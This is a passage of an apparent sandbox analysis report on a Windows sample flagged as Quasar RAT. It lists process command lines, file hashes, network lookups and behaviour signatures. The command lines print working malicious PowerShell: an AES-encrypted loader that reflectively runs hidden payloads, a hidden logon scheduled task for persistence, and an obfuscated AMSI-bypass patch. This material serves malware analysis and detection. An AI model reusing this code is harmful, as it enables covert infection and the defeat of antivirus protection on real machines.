$param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_84_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_84.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_84.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_84.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Roaming\Windows_Log_84.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rzzoeQKyhAKC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$snhOBNbqMbrjTn,[Parameter(Position=1)][Type]$hcFGkaScVu)$WNiemwahZci=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+'c'+'t'+'e'+'d'+''+[Char](68)+'ele'+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'M'+'e'+''+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+'te'+[Char](84)+''+'y'+'p'+'e'+'',''+'C'+'l'+[Char](97)+''+[Char](115)+'s'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+'n'+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+','+''+'A'+'ut'+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WNiemwahZci.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+'a'+'l'+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$snhOBNbqMbrjTn).SetImplementationFlags(''+[Char](82)+'un'+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$WNiemwahZci.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'ub'+'l'+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+',N'+[Char](101)+'w'+[Char](83)+''+'l'
+''+[Char](111)+''+[Char](116)+','+'V'+''+'i'+''+[Char](114)+'t'+'u'+'a'+[Char](108)+'',$hcFGkaScVu,$snhOBNbqMbrjTn).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+'e'+''+','+'Ma'+'n'+'aged');Write-Output $WNiemwahZci.CreateType();}$ebdedbTUhITbm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'em'+'.'+''+'d'+'ll')}).GetType(''+'M'+''+'i'+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+'Wi'+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+'n'+'s'+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+'e'+'th'+[Char](111)+''+[Char](100)+''+'s'+'');$VXwquTnXnPjGZL=$ebdedbTUhITbm.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'dr'+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+'c'+''+','+'S'+'t'+''+'a'+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$VDyOxnwUhwrVWlqJMOW=rzzoeQKyhAKC @([String])([IntPtr]);$zxlQCNATXVvABERMdrSmmZ=rzzoeQKyhAKC 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AKelfWNAWgg=$ebdedbTUhITbm.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+'a'+'n'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+[Char](108)+''+'3'+''+[Char](50)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')));$jYcXFfQufXLrIb=$VXwquTnXnPjGZL.Invoke($Null,@([Object]$AKelfWNAWgg,[Object]('L'+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+'raryA')));$qaXvbwFcNhBkCygAl=$VXwquTnXnPjGZL.Invoke($Null,@([Object]$AKelfWNAWgg,[Object]('V'+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+'l'+'P'+''+[Char](114)+'o'+'t'+'e'+'c'+''+[Char](116)+'')));$XUSAHTC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jYcXFfQufXLrIb,$VDyOxnwUhwrVWlqJMOW).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+'l'+'l'+'');$hVIjLxsHXidRDMGIl=$VXwquTnXnPjGZL.Invoke($Null,@([Object]$XUSAHTC,[Object]('Am'+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$trkvCXDLfS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qaXvbwFcNhBkCygAl,$zxlQCNATXVvABERMdrSmmZ).Invoke($hVIjLxsHXidRDMGIl,[uint32]8,4,[ref]$trkvCXDLfS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hVIjLxsHXidRDMGIl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qaXvbwFcNhBkCygAl,$zxlQCNATXVvABERMdrSmmZ).Invoke($hVIjLxsHXidRDMGIl,[uint32]8,0x20,[ref]$trkvCXDLfS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+'W'+[Char](65)+''+'R'+'E').GetValue(''+[Char](36)+''+[Char](115)+''+[Char](120)+''+[Char](114)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{926ed3a3-1b2e-462b-8b43-2df6e608e5c8}
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe e6d3e296fb89abf3bcb0887ede4bb112 IHWnMT+wD02CCpkizVKQjg.0.1.0.0.0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | freegeoip.net | udp |
Files
memory/1852-0-0x000000007540E000-0x000000007540F000-memory.dmp
memory/1852-1-0x00000000047E0000-0x0000000004816000-memory.dmp
memory/1852-3-0x0000000004E50000-0x0000000005478000-memory.dmp
memory/1852-2-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/1852-4-0x0000000004DD0000-0x0000000004DF2000-memory.dmp
memory/1852-5-0x00000000056B0000-0x0000000005716000-memory.dmp
memory/1852-6-0x0000000005720000-0x0000000005786000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e3exzvch.iax.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1852-16-0x00000000057D0000-0x0000000005B24000-memory.dmp
memory/1852-17-0x0000000005C80000-0x0000000005C9E000-memory.dmp
memory/1852-18-0x0000000005CD0000-0x0000000005D1C000-memory.dmp
memory/1852-19-0x0000000006E00000-0x0000000006E44000-memory.dmp
memory/1852-20-0x0000000006F70000-0x0000000006FE6000-memory.dmp
memory/1852-21-0x0000000007670000-0x0000000007CEA000-memory.dmp
memory/1852-22-0x0000000007010000-0x000000000702A000-memory.dmp
memory/1852-23-0x0000000000A10000-0x0000000000A18000-memory.dmp
memory/1852-24-0x0000000007240000-0x00000000072AE000-memory.dmp
memory/1852-25-0x000000000A2A0000-0x000000000A844000-memory.dmp
memory/2332-27-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/2332-28-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/2332-29-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/2332-39-0x0000000006470000-0x00000000064A2000-memory.dmp
memory/2332-40-0x00000000711A0000-0x00000000711EC000-memory.dmp
memory/2332-51-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/2332-50-0x0000000006450000-0x000000000646E000-memory.dmp
memory/2332-53-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/2332-52-0x0000000007080000-0x0000000007123000-memory.dmp
memory/2332-54-0x0000000007240000-0x000000000724A000-memory.dmp
memory/2332-55-0x0000000007450000-0x00000000074E6000-memory.dmp
memory/2332-56-0x00000000073D0000-0x00000000073E1000-memory.dmp
memory/2332-57-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/2332-60-0x0000000075400000-0x0000000075BB0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4d1f832f887a29cd6ee3d901727835c1 |
| SHA1 | 4f64e9327c3d5571dc4c401aec62e52894e92e52 |
| SHA256 | 0ad91bcd486841d65727f7f4f1c8983c6c030aa7a74badf799141d9c0266a183 |
| SHA512 | a4f6ed11c8c4845ad4032c3aa323e015e63872f506c65e9677c5223b8a03317c0776dacd54c24117ee365a028ee8baeffe66fd03193bbc39af5c5e2af9cfe07f |
C:\Users\Admin\AppData\Roaming\Windows_Log_84.vbs
| MD5 | 750528b35ca8a97cadf1a08441f7b523 |
| SHA1 | e99f6de402feb70884868593d097ea76cfd6319f |
| SHA256 | 0af72095efe07657271a5c3668ef0aa578d8cc536ec8c3a1f3542512dd33ad42 |
| SHA512 | e3a9501beeb49bfbfc7457f0d7f9fe469da0b484ce02cb8ccbe670795e9d637c4e2cfce7f8fc4a4692377c88e6dc2d62b6e0e9ca26a8f82ae11499bbe90268c4 |
C:\Users\Admin\AppData\Roaming\Windows_Log_84.bat
| MD5 | d4c582bb5890af020c110f2b1de1d9db |
| SHA1 | 04c25b115c7bdaced94746c4acf9b5245f064ea0 |
| SHA256 | d34225f65c10acac82f381cf0f4281b2bc691afb2b72a1331acee94ca10e5c1c |
| SHA512 | 4b104fd0f62ecab38cc02b4cd77e6b8b5bcaaa3d98ad48f537fc7a67aa7d72d4575026921b63c9a743a41faaf3dd3154717bd6690f87dcb4114da05106b93012 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | cd2c75d15d8eb9167d113a4a2b932a6b |
| SHA1 | 7de577bf0594c4ffe8c1d52548c41f2c627922e4 |
| SHA256 | d1600d97356b905bd8140cf30ed23b10717107b30d82963c36ef2135a94e0938 |
| SHA512 | abd4bfe9aea63dd8c1198fb645fca3de30b8bbcd691914a1eeccec54690338d66e9aad371454cd5f0cfae79b5bb3b2b79a24db5519e5e41a959d57b96f99dd14 |
memory/1852-78-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/1952-81-0x0000000007560000-0x00000000075BE000-memory.dmp
memory/1952-82-0x0000000009DF0000-0x0000000009E82000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Install.exe
| MD5 | b489b7d9efc807fb9583f21f39327fc2 |
| SHA1 | 1ee42e6c08cd0a51d5c763c6b8771c004b962865 |
| SHA256 | 6f1bc33cba78e569e98566aa17be4a548c9ed1a6ea0f35a2149ad504def56579 |
| SHA512 | 53be2dc3574e1da8c643b24e6b982a19f6f2f4748acc38d5c625f66e701c1b4124156983c29668c8bed4c79b5f27d0f932c8a38ebecb33170c283f1161068c2e |
memory/1952-90-0x0000000007370000-0x0000000007382000-memory.dmp
memory/3188-91-0x0000026A22DA0000-0x0000026A22DC2000-memory.dmp
memory/3188-101-0x0000026A23110000-0x0000026A2313A000-memory.dmp
memory/3188-103-0x00007FF8EB220000-0x00007FF8EB2DE000-memory.dmp
memory/3188-102-0x00007FF8ECC30000-0x00007FF8ECE25000-memory.dmp
memory/4924-107-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4924-106-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4924-105-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4924-104-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4924-111-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4924-112-0x00007FF8ECC30000-0x00007FF8ECE25000-memory.dmp
memory/4924-113-0x00007FF8EB220000-0x00007FF8EB2DE000-memory.dmp
memory/668-135-0x00007FF8ACCB0000-0x00007FF8ACCC0000-memory.dmp
memory/668-134-0x000001F72FE00000-0x000001F72FE2A000-memory.dmp
memory/612-125-0x00007FF8ACCB0000-0x00007FF8ACCC0000-memory.dmp
memory/388-165-0x00007FF8ACCB0000-0x00007FF8ACCC0000-memory.dmp
memory/388-164-0x00000220C9710000-0x00000220C973A000-memory.dmp
memory/388-159-0x00000220C9710000-0x00000220C973A000-memory.dmp
memory/336-155-0x00007FF8ACCB0000-0x00007FF8ACCC0000-memory.dmp
memory/336-154-0x000001ED85D10000-0x000001ED85D3A000-memory.dmp
memory/336-149-0x000001ED85D10000-0x000001ED85D3A000-memory.dmp
memory/956-145-0x00007FF8ACCB0000-0x00007FF8ACCC0000-memory.dmp
memory/956-144-0x0000023A753A0000-0x0000023A753CA000-memory.dmp
memory/956-139-0x0000023A753A0000-0x0000023A753CA000-memory.dmp
memory/612-124-0x00000245EC210000-0x00000245EC23A000-memory.dmp
memory/668-129-0x000001F72FE00000-0x000001F72FE2A000-memory.dmp
memory/612-119-0x00000245EC210000-0x00000245EC23A000-memory.dmp
memory/612-118-0x00000245EC210000-0x00000245EC23A000-memory.dmp
memory/612-117-0x00000245EC1E0000-0x00000245EC205000-memory.dmp
memory/4924-114-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1952-747-0x000000000A0E0000-0x000000000A0EA000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 0b990e24f1e839462c0ac35fef1d119e |
| SHA1 | 9e17905f8f68f9ce0a2024d57b537aa8b39c6708 |
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
| SHA512 | c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | ceb7caa4e9c4b8d760dbf7e9e5ca44c5 |
| SHA1 | a3879621f9493414d497ea6d70fbf17e283d5c08 |
| SHA256 | 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9 |
| SHA512 | 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 7d612892b20e70250dbd00d0cdd4f09b |
| SHA1 | 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5 |
| SHA256 | 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02 |
| SHA512 | f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | 8abf2d6067c6f3191a015f84aa9b6efe |
| SHA1 | 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7 |
| SHA256 | ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea |
| SHA512 | c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | f313c5b4f95605026428425586317353 |
| SHA1 | 06be66fa06e1cffc54459c38d3d258f46669d01a |
| SHA256 | 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b |
| SHA512 | b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-11 17:41
Reported
2024-06-11 17:46
Platform
win11-20240508-en
Max time kernel
300s
Max time network
271s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3304 created 636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3304 set thread context of 4004 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
